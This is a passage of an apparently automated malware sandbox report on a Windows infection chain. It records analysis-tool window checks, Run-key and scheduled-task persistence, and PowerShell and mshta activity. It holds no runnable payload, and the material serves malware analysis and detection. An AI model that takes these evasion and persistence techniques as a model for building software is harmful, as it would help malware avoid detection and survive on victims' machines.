Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6855F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C6855F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
